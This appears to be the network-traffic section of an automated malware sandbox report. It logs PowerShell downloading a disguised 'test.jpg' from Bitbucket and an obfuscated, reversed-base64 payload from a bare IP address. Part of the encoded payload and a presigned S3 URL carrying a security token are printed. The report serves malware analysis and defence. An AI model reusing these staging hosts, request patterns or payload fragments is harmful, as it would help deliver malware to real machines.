                                                                                          Jan 20, 2025 15:49:17.703241110 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.703255892 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.703267097 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.703273058 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.703289032 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.703303099 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.703466892 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.783713102 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.783873081 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.783898115 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.783914089 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.783931017 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.783936024 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.783946991 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.783962011 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.783968925 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.783977985 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.783983946 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.783992052 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784006119 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784015894 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.784019947 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784034967 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784044027 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.784064054 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784079075 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.784095049 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784110069 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784135103 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784149885 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.784149885 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784164906 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784169912 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.784188986 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784200907 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.784203053 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784225941 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784240007 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.784240961 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784256935 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784269094 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784284115 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784291983 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.784300089 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784316063 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784318924 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.784332037 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784343958 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.784346104 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784360886 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784367085 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.784377098 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.784416914 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.785924911 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.785938025 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.785960913 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.785976887 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.785978079 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.785990000 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786000967 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.786004066 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786030054 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786030054 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.786046982 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786062956 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786063910 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.786086082 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786101103 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786112070 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.786113977 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786128044 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786137104 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.786143064 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786159039 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786161900 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.786176920 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786190033 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786192894 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.786206961 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.786242008 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.789371014 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789387941 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789407969 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.789412022 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789427042 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789443016 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789446115 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.789475918 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.789520979 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789536953 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789551973 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789566040 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789576054 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.789582968 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789599895 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789608955 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.789614916 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.789634943 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.832881927 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.961957932 CET4973980192.168.2.462.60.226.64

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 20, 2025 15:49:10.541661978 CET5343453192.168.2.41.1.1.1
                                                                                          Jan 20, 2025 15:49:10.548773050 CET53534341.1.1.1192.168.2.4
                                                                                          Jan 20, 2025 15:49:11.776865959 CET5239253192.168.2.41.1.1.1
                                                                                          Jan 20, 2025 15:49:11.801826000 CET53523921.1.1.1192.168.2.4

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Jan 20, 2025 15:49:10.541661978 CET192.168.2.41.1.1.10x5d65Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                          Jan 20, 2025 15:49:11.776865959 CET192.168.2.41.1.1.10x3801Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Jan 20, 2025 15:49:10.548773050 CET1.1.1.1192.168.2.40x5d65No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                          Jan 20, 2025 15:49:10.548773050 CET1.1.1.1192.168.2.40x5d65No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                          Jan 20, 2025 15:49:10.548773050 CET1.1.1.1192.168.2.40x5d65No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                          Jan 20, 2025 15:49:11.801826000 CET1.1.1.1192.168.2.40x3801No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Jan 20, 2025 15:49:11.801826000 CET1.1.1.1192.168.2.40x3801No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Jan 20, 2025 15:49:11.801826000 CET1.1.1.1192.168.2.40x3801No error (0)s3-w.us-east-1.amazonaws.com54.231.134.241A (IP address)IN (0x0001)false
                                                                                          Jan 20, 2025 15:49:11.801826000 CET1.1.1.1192.168.2.40x3801No error (0)s3-w.us-east-1.amazonaws.com52.217.129.33A (IP address)IN (0x0001)false
                                                                                          Jan 20, 2025 15:49:11.801826000 CET1.1.1.1192.168.2.40x3801No error (0)s3-w.us-east-1.amazonaws.com52.216.59.193A (IP address)IN (0x0001)false
                                                                                          Jan 20, 2025 15:49:11.801826000 CET1.1.1.1192.168.2.40x3801No error (0)s3-w.us-east-1.amazonaws.com54.231.194.161A (IP address)IN (0x0001)false
                                                                                          Jan 20, 2025 15:49:11.801826000 CET1.1.1.1192.168.2.40x3801No error (0)s3-w.us-east-1.amazonaws.com3.5.21.114A (IP address)IN (0x0001)false
                                                                                          Jan 20, 2025 15:49:11.801826000 CET1.1.1.1192.168.2.40x3801No error (0)s3-w.us-east-1.amazonaws.com52.216.26.28A (IP address)IN (0x0001)false
                                                                                          Jan 20, 2025 15:49:11.801826000 CET1.1.1.1192.168.2.40x3801No error (0)s3-w.us-east-1.amazonaws.com54.231.129.249A (IP address)IN (0x0001)false
                                                                                          Jan 20, 2025 15:49:11.801826000 CET1.1.1.1192.168.2.40x3801No error (0)s3-w.us-east-1.amazonaws.com54.231.173.1A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • bitbucket.org
                                                                                          • bbuseruploads.s3.amazonaws.com
                                                                                          • 62.60.226.64

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.44973962.60.226.64808112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 20, 2025 15:49:16.523586988 CET86OUTGET /public_files/kmAFAhc.txt HTTP/1.1
                                                                                          Host: 62.60.226.64
                                                                                          Connection: Keep-Alive
                                                                                          Jan 20, 2025 15:49:17.156408072 CET1236INHTTP/1.1 200 OK
                                                                                          Date: Mon, 20 Jan 2025 14:49:17 GMT
                                                                                          Server: Apache/2.4.62 (CentOS Stream)
                                                                                          Last-Modified: Mon, 20 Jan 2025 09:52:15 GMT
                                                                                          ETag: "95304-62c203718608d"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 611076
                                                                                          Content-Disposition: attachment
                                                                                          Content-Type: application/octet-stream
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                          Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxwWMQFDMAAAAQAwBwCwPE9DQ/wzP48DN/AzPs8DK/wxPY8DF/AxPM8DC/QwPA4D/erTgDgfOMnDy5waOomDp5gZOAmDc5AWOQlDQ5AxNEdDQ3wzN4cDN3AzNscDK3QyNgcDH3gxNUcDE3wwNIcDB3AgN8bDerTgD2QvNwbD72guNkbD42wtNYbD12AtNMbDy2QsNAbDv2grN0aDs2wqNoaDp2AqNcaDm2QpNQaDj2goNEaDg2wnN4ZDd2AnNsZDa2QmNgZDX2glNUZDU2wkNIZDR2AkN8YDO2QjNwYDL2giNkYDI2whNYYDF2AhNMYDC2QgNAUD/1gfN0XD81weNoXD51AeNcXD21QdNQXDz1gcNEXDw1wbN4WDt1AbNsWDq1QaNgWDn1gZNUWDk1wYNIWDh1AYN8VDe1QXNwVDb1gWNkVDY1wVNYVDV1AVNMVDS1QUNAVDP1gTN0UDM1wSNoUDJ1ASNcUDG1QRNQUDD1gQNEUDA0wPN4TD90APNsTD60QONgTD30gN
                                                                                          Jan 20, 2025 15:49:17.156446934 CET1236INData Raw: 4e 55 54 44 30 30 77 4d 4e 49 54 44 78 30 41 4d 4e 38 53 44 75 30 51 4c 4e 77 53 44 72 30 67 4b 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 5a 30 41 47 4e 63
                                                                                          Data Ascii: NUTD00wMNITDx0AMN8SDu0QLNwSDr0gKNkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDZ0AGNcRDW0QFNQRDT0gENERDQ0wDN4QDN0ADNsQDK0QCNgQDH0gBNUQDE0wANIQDB0AwM8PDerTgDzQ/MwPD7zgerTgDMkPD4zw9MYPD1zA9MMPDyzQ8MAPDvzg7M0ODszw6MoODpzA6McODmzQ5MQODjzg4MEODgzw3M4N
                                                                                          Jan 20, 2025 15:49:17.156461954 CET448INData Raw: 52 65 72 54 67 44 41 6b 50 38 34 44 4f 65 72 54 67 44 51 6a 50 77 34 44 4c 65 72 54 67 44 67 69 50 6b 34 44 49 65 72 54 67 44 77 68 50 59 34 44 46 65 72 54 67 44 41 68 50 4d 34 44 43 65 72 54 67 44 51 67 50 41 30 44 2f 39 67 66 50 30 33 44 38 39
                                                                                          Data Ascii: RerTgDAkP84DOerTgDQjPw4DLerTgDgiPk4DIerTgDwhPY4DFerTgDAhPM4DCerTgDQgPA0D/9gfP03D89wePo3D59AePc3D29QdPQ3Dz9gcPE3Dw9wbP42Dt9AbPs2Dq9QaPg2Dn9gZPU2Dk9wYPI2Dh9AYP81De9QXPw1Db9gWPk1DY9wVPY1DV9AVPM1DS9QUPA1DP9gTP00DM9wSPo0DJ9ASPc0DG9QRPQ0DD9gQPE0DA8w
                                                                                          Jan 20, 2025 15:49:17.156477928 CET1236INData Raw: 31 37 41 39 4f 4d 76 44 79 37 51 38 4f 41 76 44 76 37 67 37 4f 30 75 44 73 37 77 36 4f 6f 75 44 70 37 41 36 4f 63 75 44 6d 37 51 35 4f 51 75 44 6a 37 67 34 4f 45 75 44 67 37 77 33 4f 34 74 44 64 37 41 33 4f 73 74 44 61 37 51 32 4f 67 74 44 58 37
                                                                                          Data Ascii: 17A9OMvDy7Q8OAvDv7g7O0uDs7w6OouDp7A6OcuDm7Q5OQuDj7g4OEuDg7w3O4tDd7A3OstDa7Q2OgtDX7g1OUtDU7w0OItDR7A0O8sDO7QzOwsDL7gyOksDI7wxOYsDF7AxOMsDC7QwOAoD/6gvO0rD86wuOorD56AuOcrD26QtOQrDz6gsOErDw6wrO4qDt6ArOsqDq6QqOgqDn6gpOUqDk6woOIqDh6AoO8pDe6QnOwpDb6g
                                                                                          Jan 20, 2025 15:49:17.156491995 CET1236INData Raw: 4e 73 53 44 71 30 51 4b 4e 67 53 44 6e 30 67 4a 4e 55 53 44 6b 30 77 49 4e 49 53 44 68 30 41 49 4e 38 52 44 65 30 51 48 4e 77 52 44 62 30 67 47 4e 6b 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 53 30 51 45 4e 41 52 44 50 30 67 44 4e 30
                                                                                          Data Ascii: NsSDq0QKNgSDn0gJNUSDk0wINISDh0AIN8RDe0QHNwRDb0gGNkRDY0wFNYRDV0AFNMRDS0QENARDP0gDN0QDM0wCNoQDJ0ACNcQDG0QBNQQDD0gANEQDAzw/M4PD9zA/MsPD6zQerTgDMgPD3zg9MUPD0zw8MIPDxzA8M8ODuzQ7MwODrzg6MkODozw5MYODlzA5MMODizQ4MAODfzg3M0NDczw2MoNDZzA2McNDWzQ1MQNDTzg
                                                                                          Jan 20, 2025 15:49:17.156507969 CET448INData Raw: 67 44 51 69 50 67 34 44 48 65 72 54 67 44 67 68 50 55 34 44 45 65 72 54 67 44 77 67 50 49 34 44 42 65 72 54 67 44 41 51 50 38 33 44 65 72 54 67 44 39 51 66 50 77 33 44 37 39 67 65 50 6b 33 44 34 39 77 64 50 59 33 44 31 39 41 64 50 4d 33 44 79 39
                                                                                          Data Ascii: gDQiPg4DHerTgDghPU4DEerTgDwgPI4DBerTgDAQP83DerTgD9QfPw3D79gePk3D49wdPY3D19AdPM3Dy9QcPA3Dv9gbP02Ds9waPo2Dp9AaPc2Dm9QZPQ2Dj9gYPE2Dg9wXP41Dd9AXPs1Da9QWPg1DX9gVPU1DU9wUPI1DR9AUP80DO9QTPw0DL9gSPk0DI9wRPY0DF9ARPM0DC9QQPAwD/8gPP0zD88wOPozD58AOPczD28Q
                                                                                          Jan 20, 2025 15:49:17.156541109 CET1236INData Raw: 4f 6b 75 44 6f 37 77 35 4f 59 75 44 6c 37 41 35 4f 4d 75 44 69 37 51 34 4f 41 75 44 66 37 67 33 4f 30 74 44 63 37 77 32 4f 6f 74 44 5a 37 41 32 4f 63 74 44 57 37 51 31 4f 51 74 44 54 37 67 30 4f 45 74 44 51 37 77 7a 4f 34 73 44 4e 37 41 7a 4f 73
                                                                                          Data Ascii: OkuDo7w5OYuDl7A5OMuDi7Q4OAuDf7g3O0tDc7w2OotDZ7A2OctDW7Q1OQtDT7g0OEtDQ7wzO4sDN7AzOssDK7QyOgsDH7gxOUsDE7wwOIsDB7AgO8rDerTgD6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmOgpDX6glOUpDU6wkOIpDR6A
                                                                                          Jan 20, 2025 15:49:17.156555891 CET1116INData Raw: 67 30 77 48 4e 34 52 44 64 30 41 48 4e 73 52 44 61 30 51 47 4e 67 52 44 58 30 67 46 4e 55 52 44 55 30 77 45 4e 49 52 44 52 30 41 45 4e 38 51 44 4f 30 51 44 4e 77 51 44 4c 30 67 43 4e 6b 51 44 49 30 77 42 4e 59 51 44 46 30 41 42 4e 4d 51 44 43 30
                                                                                          Data Ascii: g0wHN4RDd0AHNsRDa0QGNgRDX0gFNURDU0wENIRDR0AEN8QDO0QDNwQDL0gCNkQDI0wBNYQDF0ABNMQDC0QANAMD/zg/M0PD8zwerTgDMoPD5zAerTgDMcPD2zQ9MQPDzzg8MEPDwzw7M4ODtzA7MsODqzQ6MgODnzg5MUODkzw4MIODhzA4M8NDezQ3MwNDbzg2MkNDYzw1MYNDVzA1MMNDSzQ0MANDPzgzM0MDMzwyMoMDJzA
                                                                                          Jan 20, 2025 15:49:17.156572104 CET1236INData Raw: 48 38 51 42 50 4d 77 44 42 37 77 2f 4f 30 76 44 37 37 51 65 72 54 67 44 4f 63 76 44 31 37 77 73 4d 57 4c 6a 30 79 34 73 4d 4b 44 41 41 41 41 49 41 48 41 47 41 34 67 4c 4f 77 69 44 71 34 41 4b 4f 59 69 44 6b 34 67 49 4f 41 69 44 65 34 41 48 4f 6f
                                                                                          Data Ascii: H8QBPMwDB7w/O0vD77QerTgDOcvD17wsMWLj0y4sMKDAAAAIAHAGA4gLOwiDq4AKOYiDk4gIOAiDe4AHOohDY4gFOQhDS4AEO4gDM4gCOggDG4ABOIgDA3g/NwfD63AerTgDNYfD03g8NAfDu3A7NoeDo3g5NQeDi3A4N4dDc3g2NgdDW3A1NIdDQ3gzNwcDK3AyNYcDE3gwNAYDerTgD2AvNobD42gtNQbDy2AsN4aDs2gqNga
                                                                                          Jan 20, 2025 15:49:17.157074928 CET224INData Raw: 4e 78 77 53 4d 6b 45 44 48 78 51 52 4d 4d 45 44 42 77 77 50 4d 30 44 44 37 77 51 4f 4d 63 44 44 31 77 77 4d 4d 45 44 44 76 77 51 4c 4d 73 43 44 70 77 77 4a 4d 55 43 44 6a 77 51 49 41 41 45 41 30 41 63 41 51 41 41 41 41 37 77 79 4f 6f 73 44 4a 37
                                                                                          Data Ascii: NxwSMkEDHxQRMMEDBwwPM0DD7wQOMcDD1wwMMEDDvwQLMsCDpwwJMUCDjwQIAAEA0AcAQAAAA7wyOosDJ7AyOcsDG7QxOQsDD7gwOEsDA6wvO4rD96AvOsrD66QuOgrD36gNNcSDm0QJNQGDMxwSMoEDJxASMcEDGxQRMQEDDxgQMEEDAwwPM4DD9wAPMsDD6wQOMgDD3wgNMUDD0wwMMIDDxwAMM8CD
                                                                                          Jan 20, 2025 15:49:17.161439896 CET1236INData Raw: 75 77 51 4c 4d 77 43 44 72 77 67 4b 4d 6b 43 44 6f 77 77 4a 4d 59 43 44 6c 77 41 4a 4d 4d 43 44 69 77 51 49 4d 34 42 44 64 77 41 48 4d 73 42 44 61 77 51 47 4d 67 42 44 58 77 67 46 4d 55 42 44 55 77 77 45 4d 49 42 44 52 77 41 45 4d 38 41 44 4f 77
                                                                                          Data Ascii: uwQLMwCDrwgKMkCDowwJMYCDlwAJMMCDiwQIM4BDdwAHMsBDawQGMgBDXwgFMUBDUwwEMIBDRwAEM8ADOwQDMwADLwgCMkADIwwBMYADFwABMMADCwQAMAAAAAQNAHADA/w/P4/D9/A/Ps/D6/QerTgDPg/D3/g9PU/D0erTgDQmPg5DXerTgDglPU5DTerTgDQkP44DNerTgDAjPs4DKerTgDQiPg4DHerTgDQhPQ4DDerTgDg


                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.449737185.166.143.484438112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-20 14:49:11 UTC98OUTGET /dfghd/fgd/downloads/test.jpg?517613 HTTP/1.1
                                                                                          Host: bitbucket.org
                                                                                          Connection: Keep-Alive
                                                                                          2025-01-20 14:49:11 UTC5935INHTTP/1.1 302 Found
                                                                                          Date: Mon, 20 Jan 2025 14:49:11 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 0
                                                                                          Server: AtlassianEdge
                                                                                          Location: https://bbuseruploads.s3.amazonaws.com/a613a3a7-960e-457b-ade9-adac2ded05f8/downloads/13e6a3ab-36e2-4926-afc8-122cd28abbda/test.jpg?response-content-disposition=attachment%3B%20filename%3D%22test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNBTKKJY5M&Signature=WrRRG%2FjNv0KYJyVNvKxc%2BY6fR%2B0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEK%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIHqlgISaXQZNWVdHrtqHFQM1aKdCCC5wz47mj8NtMH%2BIAiBdtBjgyJZ6tj7uXWFGVxbXJfoLZTyvi2A7sXwcgSrL%2BSqwAgio%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMFJaKkm%2Baexgdux4uKoQC6KXHopDQ%2FlrvHmoVWqroq7CEf10111jAHgCJB1MtIiwoslQvWwr%2B0TjbV0drvIlTQrZSoCEisB3EKyeKiSOdy4cG7zLV8sUpkCTFObt0YVdcZihx5WCNnElUd6Q0GtOsyOJ54uKNitBk4qLGC%2F8FLxoWB8Zd7GFtIhjBH6oiR29zWtJHxVJMEzbEk0X8I6ra5TJTAxAmj%2FGBrJRWzhpL7djvH%2BWsC9IJL3xndZ130rjzzEn3Hy0dMH4Ffr76tlD%2FuZUeGrYyghPc8SyR5fqjbJHN3e9nSOiKDWOIXmDqOsRdlmX0FjNbG66IlTsda3suu%2BoRn1c7bGtYzOEXJO6jQojgYsEwsMC5vAY6ngHasjGz4hS4AfIgJXweXhdRz1bV7MycPu%2FtoygR37IQAI2SIbv%2BJt7FUa41kbstbCnTf83poZhHfI9%2 [TRUNCATED]
                                                                                          Expires: Mon, 20 Jan 2025 14:49:11 GMT
                                                                                          Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                          X-Used-Mesh: False
                                                                                          Vary: Accept-Language, Origin
                                                                                          Content-Language: en
                                                                                          X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                          X-Dc-Location: Micros-3
                                                                                          X-Served-By: cf1f26f6a395
                                                                                          X-Version: 65107e80b38c
                                                                                          X-Static-Version: 65107e80b38c
                                                                                          X-Request-Count: 3932
                                                                                          X-Render-Time: 0.0530238151550293
                                                                                          X-B3-Traceid: 810b552fe51c46f28a2c2f9a344f92b7
                                                                                          X-B3-Spanid: 2d829d0d1cb53d6f
                                                                                          X-Frame-Options: SAMEORIGIN
